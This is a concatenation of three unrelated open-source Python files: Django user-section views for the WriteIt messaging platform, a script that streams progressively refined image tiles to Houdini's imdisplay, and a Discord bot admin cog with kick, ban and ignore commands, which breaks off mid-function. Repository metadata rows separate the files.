WriteItInstanceAnswerNotificationForm, \
WriteItInstanceApiAutoconfirmForm, \
WriteItInstanceCreateForm, \
WriteItInstanceModerationForm, \
WriteItInstanceMaxRecipientsForm, \
WriteItInstanceRateLimiterForm, \
WriteItInstanceWebBasedForm, \
AnswerForm, RelatePopitInstanceWithWriteItInstance, \
WebhookCreateForm
from django.contrib import messages as view_messages
from django.utils.translation import ugettext as _
import json
from nuntium.popit_api_instance import PopitApiInstance
from nuntium.tasks import pull_from_popit
from nuntium.user_section.forms import WriteItPopitUpdateForm
from django.contrib.sites.models import Site
class UserAccountView(TemplateView):
template_name = 'nuntium/profiles/your-profile.html'
@method_decorator(login_required)
def dispatch(self, *args, **kwargs):
return super(UserAccountView, self).dispatch(*args, **kwargs)
class WriteItInstanceDetailBaseView(DetailView):
model = WriteItInstance
@method_decorator(login_required)
def dispatch(self, request, *args, **kwargs):
self.kwargs['slug'] = request.subdomain
return super(DetailView, self).dispatch(request, *args, **kwargs)
def get_object(self, queryset=None):
self.object = super(DetailView, self).get_object(queryset=queryset)
#OK I don't know if it is better to test by id
if not self.object.owner.__eq__(self.request.user):
raise Http404
return self.object
class WriteItInstanceContactDetailView(WriteItInstanceDetailBaseView):
template_name = 'nuntium/profiles/contacts/contacts-per-writeitinstance.html'
def dispatch(self, request, *args, **kwargs):
self.kwargs['slug'] = request.subdomain
return super(WriteItInstanceContactDetailView, self).dispatch(request, *args, **kwargs)
def get_context_data(self, **kwargs):
context = super(WriteItInstanceContactDetailView, self).get_context_data(**kwargs)
context['people'] = self.object.persons.order_by('name')
return context
class WriteItInstanceStatusView(WriteItInstanceDetailBaseView):
def render_to_response(self, context, **response_kwargs):
status = self.object.pulling_from_popit_status
return HttpResponse(
json.dumps(status),
content_type='application/json',
**response_kwargs
)
class WriteItInstanceApiDocsView(WriteItInstanceDetailBaseView):
template_name = 'nuntium/writeitinstance_api_docs.html'
def get_context_data(self, *args, **kwargs):
context = super(WriteItInstanceApiDocsView, self).get_context_data(*args, **kwargs)
current_domain = Site.objects.get_current().domain
context['api_base_url'] = 'http://' + current_domain + '/api/v1/'
return context
class WriteItInstanceTemplateUpdateView(DetailView):
model = WriteItInstance
template_name = 'nuntium/profiles/templates.html'
@method_decorator(login_required)
def dispatch(self, request, *args, **kwargs):
self.kwargs['slug'] = request.subdomain
return super(WriteItInstanceTemplateUpdateView, self).dispatch(request, *args, **kwargs)
def get_object(self, queryset=None):
self.object = super(WriteItInstanceTemplateUpdateView, self).get_object(queryset=queryset)
#OK I don't know if it is better to test by id
if not self.object.owner.__eq__(self.request.user):
raise Http404
return self.object
def get_context_data(self, **kwargs):
context = super(WriteItInstanceTemplateUpdateView, self).get_context_data(**kwargs)
context['new_answer_template_form'] = NewAnswerNotificationTemplateForm(
writeitinstance=self.object,
instance=self.object.new_answer_notification_template,
)
context['mailit_template_form'] = MailitTemplateForm(
writeitinstance=self.object,
instance=self.object.mailit_template,
)
context['confirmation_template_form'] = ConfirmationTemplateForm(
writeitinstance=self.object,
instance=self.object.confirmationtemplate,
)
return context
class WriteItInstanceUpdateView(UpdateView):
form_class = WriteItInstanceBasicForm
template_name = "nuntium/writeitinstance_update_form.html"
model = WriteItInstance
@method_decorator(login_required)
def dispatch(self, request, *args, **kwargs):
self.kwargs['slug'] = request.subdomain
return super(WriteItInstanceUpdateView, self).dispatch(request, *args, **kwargs)
def get_queryset(self):
queryset = super(WriteItInstanceUpdateView, self).get_queryset().filter(owner=self.request.user)
return queryset
def get_success_url(self):
return reverse(
'writeitinstance_basic_update',
subdomain=self.object.slug,
)
class WriteItInstanceAdvancedUpdateView(UpdateView):
model = WriteItInstanceConfig
@method_decorator(login_required)
def dispatch(self, request, *args, **kwargs):
self.kwargs['slug'] = request.subdomain
return super(WriteItInstanceAdvancedUpdateView, self).dispatch(request, *args, **kwargs)
def get_queryset(self):
return super(WriteItInstanceAdvancedUpdateView, self).get_queryset().filter(writeitinstance__owner=self.request.user)
def get_context_data(self, **kwargs):
context = super(WriteItInstanceAdvancedUpdateView, self).get_context_data(**kwargs)
context['writeitinstance'] = self.object.writeitinstance
return context
def get_slug_field(self):
return 'writeitinstance__slug'
class WriteItInstanceAnswerNotificationView(WriteItInstanceAdvancedUpdateView):
form_class = WriteItInstanceAnswerNotificationForm
template_name = 'nuntium/writeitinstance_answernotification_form.html'
def get_success_url(self):
return reverse(
'writeitinstance_answernotification_update',
subdomain=self.object.writeitinstance.slug
)
class WriteItInstanceRateLimiterView(WriteItInstanceAdvancedUpdateView):
form_class = WriteItInstanceRateLimiterForm
template_name = 'nuntium/writeitinstance_ratelimiter_form.html'
def get_success_url(self):
return reverse(
'writeitinstance_ratelimiter_update',
subdomain=self.object.writeitinstance.slug
)
class WriteItInstanceModerationView(WriteItInstanceAdvancedUpdateView):
form_class = WriteItInstanceModerationForm
template_name = 'nuntium/writeitinstance_moderation_form.html'
def get_success_url(self):
return reverse(
'writeitinstance_moderation_update',
subdomain=self.object.writeitinstance.slug
)
class WriteItInstanceApiAutoconfirmView(WriteItInstanceAdvancedUpdateView):
form_class = WriteItInstanceApiAutoconfirmForm
template_name = 'nuntium/writeitinstance_autoconfirm_form.html'
def get_success_url(self):
return reverse(
'writeitinstance_api_autoconfirm_update',
subdomain=self.object.writeitinstance.slug
)
class WriteItInstanceMaxRecipientsView(WriteItInstanceAdvancedUpdateView):
form_class = WriteItInstanceMaxRecipientsForm
template_name = 'nuntium/writeitinstance_max_recipients_form.html'
def get_success_url(self):
return reverse(
'writeitinstance_maxrecipients_update',
subdomain=self.object.writeitinstance.slug
)
class WriteItInstanceWebBasedView(WriteItInstanceAdvancedUpdateView):
form_class = WriteItInstanceWebBasedForm
template_name = 'nuntium/writeitinstance_web_based_form.html'
def get_success_url(self):
return reverse(
'writeitinstance_webbased_update',
subdomain=self.object.writeitinstance.slug
)
class UserSectionListView(ListView):
@method_decorator(login_required)
def dispatch(self, *args, **kwargs):
return super(UserSectionListView, self).dispatch(*args, **kwargs)
def get_queryset(self):
queryset = super(UserSectionListView, self).get_queryset().filter(owner=self.request.user)
return queryset
class WriteItInstanceCreateView(CreateView):
model = WriteItInstance
form_class = WriteItInstanceCreateForm
template_name = 'nuntium/create_new_writeitinstance.html'
@method_decorator(login_required)
def dispatch(self, *args, **kwargs):
return super(WriteItInstanceCreateView, self).dispatch(*args, **kwargs)
def get_success_url(self):
return reverse(
'welcome',
subdomain=self.object.slug
)
def get_form_kwargs(self):
kwargs = super(WriteItInstanceCreateView, self).get_form_kwargs()
kwargs['owner'] = self.request.user
if 'data' in kwargs and kwargs['data'].get('legislature'):
kwargs['data'] = kwargs['data'].copy()
kwargs['data']['popit_url'] = kwargs['data']['legislature']
return kwargs
def get_context_data(self, *args, **kwargs):
context = super(WriteItInstanceCreateView, self).get_context_data(*args, **kwargs)
countries_json_url = ('http://everypolitician.github.io/'
'everypolitician-writeinpublic/countries.json')
context['countries'] = requests.get(countries_json_url).json()
return context
class YourInstancesView(UserSectionListView):
model = WriteItInstance
template_name = 'nuntium/profiles/your-instances.html'
def get_context_data(self, **kwargs):
kwargs = super(YourInstancesView, self).get_context_data(**kwargs)
kwargs['new_instance_form'] = WriteItInstanceCreateForm()
kwargs['live_sites'] = kwargs['object_list'].filter(config__testing_mode=False)
kwargs['test_sites'] = kwargs['object_list'].filter(config__testing_mode=True)
return kwargs
class LoginRequiredMixin(View):
@method_decorator(login_required)
def dispatch(self, *args, **kwargs):
return super(LoginRequiredMixin, self).dispatch(*args, **kwargs)
class WriteItInstanceOwnerMixin(LoginRequiredMixin):
def get_object(self):
slug = self.request.subdomain
pk = self.kwargs.get('pk')
return get_object_or_404(self.model, writeitinstance__slug=slug, writeitinstance__owner=self.request.user, pk=pk)
def get_context_data(self, **kwargs):
context = super(WriteItInstanceOwnerMixin, self).get_context_data(**kwargs)
context['writeitinstance'] = self.object.writeitinstance
return context
# Note that there is no need for subclasses of this to also subclass WriteItInstanceOwnerMixin
# as it does its own owner checking.
class UpdateTemplateWithWriteitBase(LoginRequiredMixin, UpdateView):
def get_object(self):
return get_object_or_404(self.model, writeitinstance__slug=self.request.subdomain, writeitinstance__owner=self.request.user)
def get_form_kwargs(self):
kwargs = super(UpdateTemplateWithWriteitBase, self).get_form_kwargs()
kwargs['writeitinstance'] = self.object.writeitinstance
return kwargs
def get_success_url(self):
return reverse(
'writeitinstance_template_update',
subdomain=self.object.writeitinstance.slug,
)
class NewAnswerNotificationTemplateUpdateView(UpdateTemplateWithWriteitBase):
form_class = NewAnswerNotificationTemplateForm
model = NewAnswerNotificationTemplate
class ConfirmationTemplateUpdateView(UpdateTemplateWithWriteitBase):
form_class = ConfirmationTemplateForm
model = ConfirmationTemplate
class MessagesPerWriteItInstance(LoginRequiredMixin, ListView):
model = Message
template_name = 'nuntium/profiles/messages_per_instance.html'
def get_queryset(self):
self.writeitinstance = get_object_or_404(WriteItInstance, slug=self.request.subdomain, owner=self.request.user)
return super(MessagesPerWriteItInstance, self).get_queryset().filter(writeitinstance=self.writeitinstance)
def get_context_data(self, **kwargs):
context = super(MessagesPerWriteItInstance, self).get_context_data(**kwargs)
context['writeitinstance'] = self.writeitinstance
return context
class MessageDetail(WriteItInstanceOwnerMixin, DetailView):
model = Message
template_name = "nuntium/profiles/message_detail.html"
class AnswerEditMixin(View):
def get_message(self):
raise NotImplementedError
@method_decorator(login_required)
def dispatch(self, *args, **kwargs):
self.message = self.get_message()
if self.message.writeitinstance.owner != self.request.user:
raise Http404
return super(AnswerEditMixin, self).dispatch(*args, **kwargs)
def get_success_url(self):
return reverse(
'message_detail_private',
subdomain=self.message.writeitinstance.slug,
kwargs={'pk': self.message.pk},
)
class AnswerCreateView(AnswerEditMixin, CreateView):
model = Answer
template_name = "nuntium/profiles/create_answer.html"
form_class = AnswerForm
def get_message(self):
message = Message.objects.get(id=self.kwargs['pk'])
return message
def get_form_kwargs(self):
kwargs = super(AnswerCreateView, self).get_form_kwargs()
kwargs['message'] = self.message
return kwargs
class AnswerUpdateView(AnswerEditMixin, UpdateView):
model = Answer
template_name = "nuntium/profiles/update_answer.html"
fields = ['content']
def get_message(self):
return self.model.objects.get(id=self.kwargs['pk']).message
class AcceptMessageView(RedirectView):
permanent = False
@method_decorator(login_required)
def dispatch(self, *args, **kwargs):
return super(AcceptMessageView, self).dispatch(*args, **kwargs)
def get_redirect_url(self, *args, **kwargs):
message = get_object_or_404(Message,
pk=kwargs['pk'],
writeitinstance__slug=self.request.subdomain,
writeitinstance__owner=self.request.user
)
message.moderate()
view_messages.info(self.request, _('The message "%(message)s" has been accepted') % {'message': message})
return reverse(
'messages_per_writeitinstance',
subdomain=message.writeitinstance.slug,
)
class RejectMessageView(RedirectView):
permanent = False
@method_decorator(login_required)
def dispatch(self, *args, **kwargs):
return super(RejectMessageView, self).dispatch(*args, **kwargs)
def get_redirect_url(self, *args, **kwargs):
message = get_object_or_404(Message,
pk=kwargs['pk'],
writeitinstance__slug=self.request.subdomain,
writeitinstance__owner=self.request.user
)
message.public = False
message.moderated = True
message.save()
view_messages.info(self.request, _('The message "%(message)s" has been rejected') % {'message': message})
return reverse(
'messages_per_writeitinstance',
subdomain=message.writeitinstance.slug,
)
class ModerationView(DetailView):
model = Moderation
slug_field = 'key'
@method_decorator(login_required)
def dispatch(self, *args, **kwargs):
return super(ModerationView, self).dispatch(*args, **kwargs)
def get_queryset(self):
queryset = super(ModerationView, self).get_queryset()
queryset.filter(
message__writeitinstance__owner=self.request.user,
message__writeitinstance__slug=self.request.subdomain,
)
return queryset
class AcceptModerationView(ModerationView):
template_name = "nuntium/moderation_accepted.html"
def get(self, *args, **kwargs):
moderation = self.get_object()
moderation.message.moderate()
return super(AcceptModerationView, self).get(*args, **kwargs)
class RejectModerationView(ModerationView):
template_name = "nuntium/moderation_rejected.html"
def get(self, *args, **kwargs):
get = super(RejectModerationView, self).get(*args, **kwargs)
self.object.message.public = False
# It is turned True to avoid users to
# mistakenly moderate this message
# in the admin section
self.object.message.moderated = True
self.object.message.save()
return get
class WriteitPopitRelatingView(FormView):
form_class = RelatePopitInstanceWithWriteItInstance
template_name = 'nuntium/profiles/writeitinstance_and_popit_relations.html'
# This method also checks for instance ownership
def get_writeitinstance(self):
self.writeitinstance = get_object_or_404(WriteItInstance, slug=self.request.subdomain, owner=self.request.user)
def dispatch(self, *args, **kwargs):
self.get_writeitinstance()
return super(WriteitPopitRelatingView, self).dispatch(*args, **kwargs)
def get_form_kwargs(self):
kwargs = super(WriteitPopitRelatingView, self).get_form_kwargs()
kwargs['writeitinstance'] = self.writeitinstance
return kwargs
def get_success_url(self):
return reverse('relate-writeit-popit', subdomain=self.writeitinstance.slug)
def form_valid(self, form):
form.relate()
# It returns an AsyncResult http://celery.readthedocs.org/en/latest/reference/celery.result.html
# that we could use for future information about this process
return super(WriteitPopitRelatingView, self).form_valid(form)
def get_context_data(self, **kwargs):
context = super(WriteitPopitRelatingView, self).get_context_data(**kwargs)
context['writeitinstance'] = self.writeitinstance
context['relations'] = self.writeitinstance.writeitinstancepopitinstancerecord_set.all()
return context
class ReSyncFromPopit(View):
def dispatch(self, *args, **kwargs):
if not self.request.user.is_authenticated():
raise Http404
return super(ReSyncFromPopit, self).dispatch(*args, **kwargs)
def post(self, request, *args, **kwargs):
writeitinstance = get_object_or_404(WriteItInstance,
slug=self.request.subdomain,
owner=self.request.user)
popits_previously_related = PopitApiInstance.objects.filter(
writeitinstancepopitinstancerecord__writeitinstance=writeitinstance)
popit_api_instance = get_object_or_404(popits_previously_related, pk=kwargs['popit_api_pk'])
pull_from_popit.delay(writeitinstance, popit_api_instance)
return HttpResponse()
class WriteItPopitUpdateView(UpdateView):
form_class = WriteItPopitUpdateForm
model = WriteitInstancePopitInstanceRecord
def get_writeitinstance(self):
self.writeitinstance = get_object_or_404(WriteItInstance, slug=self.request.subdomain, owner=self.request.user)
def dispatch(self, *args, **kwargs):
self.get_writeitinstance()
if self.request.method != 'POST':
return self.http_method_not_allowed(*args, **kwargs)
return super(WriteItPopitUpdateView, self).dispatch(*args, **kwargs)
def form_valid(self, form):
form.save()
return HttpResponse(
json.dumps({
'id': form.instance.id,
'periodicity': form.instance.periodicity
}),
content_type='application/json'
)
def form_invalid(self, form):
super(WriteItPopitUpdateView, self).form_invalid(form)
return HttpResponse(
json.dumps({
'errors': form.errors
}),
content_type='application/json'
)
class WriteItDeleteView(DeleteView):
model = WriteItInstance
# @method_decorator(login_required)
def dispatch(self, request, *args, **kwargs):
self.kwargs['slug'] = request.subdomain
return super(WriteItDeleteView, self).dispatch(request, *args, **kwargs)
def get_object(self, queryset=None):
obj = super(WriteItDeleteView, self).get_object(queryset=queryset)
if not obj.owner == self.request.user:
raise Http404
return obj
def get_success_url(self):
url = reverse('your-instances')
return url
class MessageTogglePublic(RedirectView):
permanent = False
@method_decorator(login_required)
def dispatch(self, *args, **kwargs):
return super(MessageTogglePublic, self).dispatch(*args, **kwargs)
def get_redirect_url(self, *args, **kwargs):
message = get_object_or_404(Message,
pk=kwargs['pk'],
writeitinstance__slug=self.request.subdomain,
writeitinstance__owner=self.request.user,
)
message.public = not message.public
message.save()
if message.public:
view_messages.info(self.request, _("This message has been marked as public"))
else:
view_messages.info(self.request, _("This message has been marked as private"))
return reverse('messages_per_writeitinstance', subdomain=self.request.subdomain)
class ContactUsView(TemplateView):
template_name = 'nuntium/profiles/contact.html'
class WelcomeView(DetailView):
model = WriteItInstance
template_name = 'nuntium/profiles/welcome.html'
@method_decorator(login_required)
def dispatch(self, request, *args, **kwargs):
self.kwargs['slug'] = request.subdomain
return super(WelcomeView, self).dispatch(request, *args, **kwargs)
def get_context_data(self, **kwargs):
context = super(WelcomeView, self).get_context_data(**kwargs)
# passing URLs in for easy insertion into the translation tags
# because we're using an overridden version of the url tag that
# doesn't allow the use of "as" to pass the url as a variable
# that can be quoted within a translation block. *sigh*
context['url_template_update'] = reverse('writeitinstance_template_update', subdomain=self.request.subdomain)
context['url_basic_update'] = reverse('writeitinstance_basic_update', subdomain=self.request.subdomain)
context['url_maxrecipients_update'] = reverse('writeitinstance_maxrecipients_update', subdomain=self.request.subdomain)
context['url_answernotification_update'] = reverse('writeitinstance_answernotification_update', subdomain=self.request.subdomain)
context['url_recipients'] = reverse('contacts-per-writeitinstance', subdomain=self.request.subdomain)
context['url_data_sources'] = reverse('relate-writeit-popit', subdomain=self.request.subdomain)
return context
class WriteItInstanceWebHooksView(WriteItInstanceDetailBaseView):
template_name = 'nuntium/profiles/webhooks.html'
def get_context_data(self, *args, **kwargs):
context = super(WriteItInstanceWebHooksView, self).get_context_data(*args, **kwargs)
context['form'] = WebhookCreateForm(writeitinstance=self.object)
return context
class WriteItInstanceCreateWebHooksView(CreateView):
model = AnswerWebHook
form_class = WebhookCreateForm
@method_decorator(login_required)
def dispatch(self, request, *args, **kwargs):
self.kwargs['slug'] = request.subdomain
self.writeitinstance = get_object_or_404(WriteItInstance,
slug=self.kwargs['slug'],
owner=self.request.user)
return super(WriteItInstanceCreateWebHooksView, self).dispatch(request, *args, **kwargs)
def get_form_kwargs(self):
kwargs = super(WriteItInstanceCreateWebHooksView, self).get_form_kwargs()
kwargs['writeitinstance'] = self.writeitinstance
return kwargs
def get_success_url(self):
return reverse(
'writeitinstance_webhooks',
subdomain=self.writeitinstance.slug,
)
| gpl-3.0 | 4,677,099,118,318,445,000 | 36.417169 | 137 | 0.692413 | false | 4.002739 | false | false | false |
cinepost/Copperfield_FX | copper/shout/drivers/refined.py | 1 | 2799 | #!/usr/bin/env python
#
# This program shows how to write data to mplay by writing data to the
# imdisplay program using a pipe.
#
# This program uses the -k option on imdisplay to perform progressive
# refinement when rendering an image. The image is quite simple.
#
# Notes:
# This uses the simple format (no deep rasters)
# It only writes 8-bit data
#
import os, struct, time
MAGIC = (ord('h')<<24) + (ord('M')<<16) + (ord('P')<<8) + ord('0')
DATASIZE = 1 # See .c file for meaning
NCHANNELS = 4 # See .c file for meaning
EO_IMAGE = -2 # End of image marker
RES = 256
COLORS = [
(0, 0, 0, 255),
(255, 0, 0, 255),
(0, 255, 0, 255),
(0, 0, 255, 255),
(255, 255, 0, 255),
(0, 255, 255, 255),
(255, 0, 255, 255),
(255, 255, 255, 255),
]
def quadrant(x, y):
# Determine which quadrant color to use
n = (x > y) * 4
n += (x > RES/2) * 2
n += (y > RES/2)
return n
class MPlay:
def __init__(self, xres, yres, name="Test Application"):
self.XRES = xres
self.YRES = yres
# Open a pipe to imdisplay
# -p tells imdisplay to read the data from the pipe
# -k tells imdisplay to keep reading data after the image has
# been fully written
self.fp = os.popen('imdisplay -p -k -n "%s"' % name, 'w')
# The header is documented in the C code examples
header = struct.pack('I'*8, MAGIC, xres, yres, DATASIZE,
NCHANNELS, 0, 0, 0)
self.fp.write(header)
def close(self):
# To tell imdisplay that the image has been finished, we send a special
# header.
header = struct.pack('iiii', EO_IMAGE, 0, 0, 0)
self.fp.write(header)
self.fp.close()
self.fp = None
def writeTile(self, x0, x1, y0, y1, clr):
# The tile header is documented in the c code.
header = struct.pack('IIII', x0, x1, y0, y1)
self.fp.write(header)
# The tile's bounds are inclusive, so to find the number of pixels we
# need to add one to each dimension.
size = (x1 - x0 + 1) * (y1 - y0 + 1)
pixel = struct.pack('BBBB', clr[0], clr[1], clr[2], clr[3])
# Write a bunch of pixel data
self.fp.write(pixel * size)
def render(self, step):
for y in range(0, self.XRES, step):
for x in range(0, self.YRES, step):
self.writeTile(x, x+step-1, y, y+step-1, COLORS[quadrant(x, y)])
def main():
mp = MPlay(RES, RES)
mp.writeTile(0, RES-1, 0, RES-1, (255, 128, 64, 255))
step = 64
while step > 0:
time.sleep(.5) # Let mplay update the latest image we wrote
mp.render(step)
step /= 2
mp.close()
if __name__ == '__main__':
main()
| unlicense | -7,526,381,331,422,434,000 | 30.1 | 80 | 0.554484 | false | 3.089404 | false | false | false |
corpnewt/CorpBot.py | Cogs/BotAdmin.py | 1 | 12950 | import asyncio, discord, re, random
from operator import itemgetter
from discord.ext import commands
from Cogs import Utils, DisplayName, Message, PickList
def setup(bot):
# Add the bot and deps
settings = bot.get_cog("Settings")
bot.add_cog(BotAdmin(bot, settings))
class BotAdmin(commands.Cog):
# Init with the bot reference, and a reference to the settings var
def __init__(self, bot, settings):
self.bot = bot
self.settings = settings
self.dregex = re.compile(r"(?i)(discord(\.gg|app\.com)\/)(?!attachments)([^\s]+)")
self.mention_re = re.compile(r"[0-9]{17,21}")
global Utils, DisplayName
Utils = self.bot.get_cog("Utils")
DisplayName = self.bot.get_cog("DisplayName")
async def message(self, message):
# Check for discord invite links and remove them if found - per server settings
if not self.dregex.search(message.content): return None # No invite in the passed message - nothing to do
# Got an invite - let's see if we care
if not self.settings.getServerStat(message.guild,"RemoveInviteLinks",False): return None # We don't care
# We *do* care, let's see if the author is admin/bot-admin as they'd have power to post invites
ctx = await self.bot.get_context(message)
if Utils.is_bot_admin(ctx): return None # We are immune!
# At this point - we need to delete the message
return { 'Ignore' : True, 'Delete' : True}
@commands.command(pass_context=True)
async def removeinvitelinks(self, ctx, *, yes_no = None):
"""Enables/Disables auto-deleting discord invite links in chat (bot-admin only)."""
if not await Utils.is_bot_admin_reply(ctx): return
await ctx.send(Utils.yes_no_setting(ctx,"Remove discord invite links","RemoveInviteLinks",yes_no))
@commands.command(pass_context=True)
async def setuserparts(self, ctx, member : discord.Member = None, *, parts : str = None):
"""Set another user's parts list (owner only)."""
# Only allow owner
isOwner = self.settings.isOwner(ctx.author)
if isOwner == None:
msg = 'I have not been claimed, *yet*.'
return await ctx.send(msg)
elif isOwner == False:
msg = 'You are not the *true* owner of me. Only the rightful owner can use this command.'
return await ctx.send(msg)
if member == None:
msg = 'Usage: `{}setuserparts [member] "[parts text]"`'.format(ctx.prefix)
return await ctx.send(msg)
if type(member) is str:
try:
member = discord.utils.get(ctx.guild.members, name=member)
except:
return await ctx.send("That member does not exist")
if not parts:
parts = ""
self.settings.setGlobalUserStat(member, "Parts", parts)
msg = '*{}\'s* parts have been set to:\n{}'.format(DisplayName.name(member), parts)
await ctx.send(Utils.suppressed(ctx,msg))
@setuserparts.error
async def setuserparts_error(self, error, ctx):
# do stuff
msg = 'setuserparts Error: {}'.format(error)
await ctx.send(msg)
@commands.command(pass_context=True)
async def ignore(self, ctx, *, member = None):
"""Adds a member to the bot's "ignore" list (bot-admin only)."""
if not await Utils.is_bot_admin_reply(ctx): return
if member == None:
msg = 'Usage: `{}ignore [member]`'.format(ctx.prefix)
return await ctx.send(msg)
if type(member) is str:
memberName = member
member = DisplayName.memberForName(memberName, ctx.guild)
if not member:
msg = 'I couldn\'t find *{}*...'.format(memberName)
return await ctx.send(Utils.suppressed(ctx,msg))
ignoreList = self.settings.getServerStat(ctx.guild, "IgnoredUsers")
for user in ignoreList:
if str(member.id) == str(user["ID"]):
# Found our user - already ignored
return await ctx.send('*{}* is already being ignored.'.format(DisplayName.name(member)))
# Let's ignore someone
ignoreList.append({ "Name" : member.name, "ID" : member.id })
self.settings.setServerStat(ctx.guild, "IgnoredUsers", ignoreList)
await ctx.send('*{}* is now being ignored.'.format(DisplayName.name(member)))
@ignore.error
async def ignore_error(self, error, ctx):
# do stuff
msg = 'ignore Error: {}'.format(error)
await ctx.send(msg)
@commands.command(pass_context=True)
async def listen(self, ctx, *, member = None):
"""Removes a member from the bot's "ignore" list (bot-admin only)."""
if not await Utils.is_bot_admin_reply(ctx): return
if member == None:
return await ctx.send('Usage: `{}listen [member]`'.format(ctx.prefix))
if type(member) is str:
memberName = member
member = DisplayName.memberForName(memberName, ctx.guild)
if not member:
msg = 'I couldn\'t find *{}*...'.format(memberName)
return await ctx.send(Utils.suppressed(ctx,msg))
ignoreList = self.settings.getServerStat(ctx.guild, "IgnoredUsers")
for user in ignoreList:
if str(member.id) == str(user["ID"]):
# Found our user - already ignored
ignoreList.remove(user)
self.settings.setServerStat(ctx.guild, "IgnoredUsers", ignoreList)
return await ctx.send("*{}* is no longer being ignored.".format(DisplayName.name(member)))
await ctx.send('*{}* wasn\'t being ignored...'.format(DisplayName.name(member)))
@listen.error
async def listen_error(self, error, ctx):
# do stuff
msg = 'listen Error: {}'.format(error)
await ctx.send(msg)
@commands.command(pass_context=True)
async def ignored(self, ctx):
"""Lists the users currently being ignored."""
ignoreArray = self.settings.getServerStat(ctx.guild, "IgnoredUsers")
promoSorted = sorted(ignoreArray, key=itemgetter('Name'))
if not len(promoSorted):
return await ctx.send("I'm not currently ignoring anyone.")
ignored = ["*{}*".format(DisplayName.name(ctx.guild.get_member(int(x["ID"])))) for x in promoSorted if ctx.guild.get_member(int(x["ID"]))]
await ctx.send("Currently Ignored Users:\n{}".format("\n".join(ignored)))
async def kick_ban(self, ctx, members_and_reason = None, command_name = "kick"):
# Helper method to handle the lifting for kick and ban
if not await Utils.is_bot_admin_reply(ctx): return
if not members_and_reason:
return await ctx.send('Usage: `{}{} [space delimited member mention/id] [reason]`'.format(ctx.prefix, command_name))
# Force a mention - we don't want any ambiguity
args = members_and_reason.split()
# Get our list of targets
targets = []
missed = []
unable = []
reason = ""
for index,item in enumerate(args):
if self.mention_re.search(item): # Check if it's a mention
# Resolve the member
mem_id = int(re.sub(r'\W+', '', item))
member = ctx.guild.get_member(mem_id)
if member is None and command_name in ("ban","unban"): # Didn't get a valid member, let's allow a pre-ban/unban if we can resolve them
try: member = await self.bot.fetch_user(mem_id)
except: pass
# If we have an invalid mention, save it to report later
if member is None:
missed.append(str(mem_id))
continue
# Let's check if we have a valid member and make sure it's not:
# 1. The bot, 2. The command caller, 3. Another bot-admin/admin
if isinstance(member, discord.Member) and (member.id == self.bot.user.id or member.id == ctx.author.id or Utils.is_bot_admin(ctx,member)):
unable.append(member.mention)
continue
if not member in targets: targets.append(member) # Only add them if we don't already have them
else:
# Not a mention - must be the reason, dump the rest of the items into a string
# separated by a space
reason = " ".join(args[index:])
break
reason = reason if len(reason) else "No reason provided."
if not len(targets):
msg = "**With reason:**\n\n{}".format(reason)
if len(unable): msg = "**Unable to {}:**\n\n{}\n\n".format(command_name,"\n".join(unable)) + msg
if len(missed): msg = "**Unmatched ID{}:**\n\n{}\n\n".format("" if len(missed) == 1 else "s","\n".join(missed)) + msg
return await Message.EmbedText(title="No valid members passed!",description=msg,color=ctx.author).send(ctx)
# We should have a list of targets, and the reason - let's list them for confirmation
# then generate a 4-digit confirmation code that the original requestor needs to confirm
# in order to follow through
confirmation_code = "".join([str(random.randint(0,9)) for x in range(4)])
msg = "**To {} the following member{}:**\n\n{}\n\n**With reason:**\n\n\"{}\"\n\n**Please type:**\n\n`{}`{}{}".format(
command_name,
"" if len(targets) == 1 else "s",
"\n".join([x.name+"#"+x.discriminator for x in targets]),
reason if len(reason) else "None",
confirmation_code,
"" if not len(missed) else "\n\n**Unmatched ID{}:**\n\n{}".format("" if len(missed) == 1 else "s", "\n".join(missed)),
"" if not len(unable) else "\n\n**Unable to {}:**\n\n{}".format(command_name,"\n".join(unable))
)
confirmation_message = await Message.EmbedText(title="{} Confirmation".format(command_name.capitalize()),description=msg,color=ctx.author).send(ctx)
def check_confirmation(message):
return message.channel == ctx.channel and ctx.author == message.author # Just making sure it's the same user/channel
try: confirmation_user = await self.bot.wait_for('message', timeout=60, check=check_confirmation)
except: confirmation_user = ""
# Delete the confirmation message
await confirmation_message.delete()
# Verify the confirmation
if not confirmation_user.content == confirmation_code: return await ctx.send("{} cancelled!".format(command_name.capitalize()))
# We got the authorization!
message = await Message.EmbedText(title="{}ing...".format("Bann" if command_name == "ban" else "Unbann" if command_name == "unban" else "Kick"),color=ctx.author).send(ctx)
canned = []
cant = []
command = {"ban":ctx.guild.ban,"kick":ctx.guild.kick,"unban":ctx.guild.unban}.get(command_name.lower(),ctx.guild.kick)
for target in targets:
try:
await command(target,reason="{}#{}: {}".format(ctx.author.name,ctx.author.discriminator,reason))
canned.append(target)
except: cant.append(target)
msg = ""
if len(canned):
msg += "**I was ABLE to {}:**\n\n{}\n\n".format(command_name,"\n".join([x.name+"#"+x.discriminator for x in canned]))
if len(cant):
msg += "**I was UNABLE to {}:**\n\n{}\n\n".format(command_name,"\n".join([x.name+"#"+x.discriminator for x in cant]))
await Message.EmbedText(title="{} Results".format(command_name.capitalize()),description=msg).edit(ctx,message)
@commands.command(pass_context=True)
async def kick(self, ctx, *, members = None, reason = None):
"""Kicks the passed members for the specified reason.
All kick targets must be mentions or ids to avoid ambiguity (bot-admin only).
eg: $kick @user1#1234 @user2#5678 @user3#9012 for spamming"""
await self.kick_ban(ctx,members,"kick")
@commands.command(pass_context=True)
async def ban(self, ctx, *, members = None, reason = None):
"""Bans the passed members for the specified reason.
All ban targets must be mentions or ids to avoid ambiguity (bot-admin only).
eg: $ban @user1#1234 @user2#5678 @user3#9012 for spamming"""
await self.kick_ban(ctx,members,"ban")
@commands.command(pass_context=True)
async def unban(self, ctx, *, members = None, reason = None):
"""Unbans the passed members for the specified reason.
All unban targets must be mentions or ids to avoid ambiguity (bot-admin only).
eg: $unban @user1#1234 @user2#5678 @user3#9012 because we're nice"""
await self.kick_ban(ctx,members,"unban")
@commands.command()
async def banned(self, ctx, *, user_id = None):
"""Queries the guild's ban list for the passed user id and responds with whether they've been banned and the reason (bot-admin only)."""
if not await Utils.is_bot_admin_reply(ctx): return
try: all_bans = await ctx.guild.bans()
except: return await ctx.send("I couldn't get the ban list :(")
if not len(all_bans): return await Message.EmbedText(title="Ban List",description="No bans found",color=ctx.author).send(ctx)
orig_user = user_id
try: user_id = int(user_id) if user_id != None else None
except: user_id = -1 # Use -1 to indicate unresolved
entries = []
for ban in all_bans:
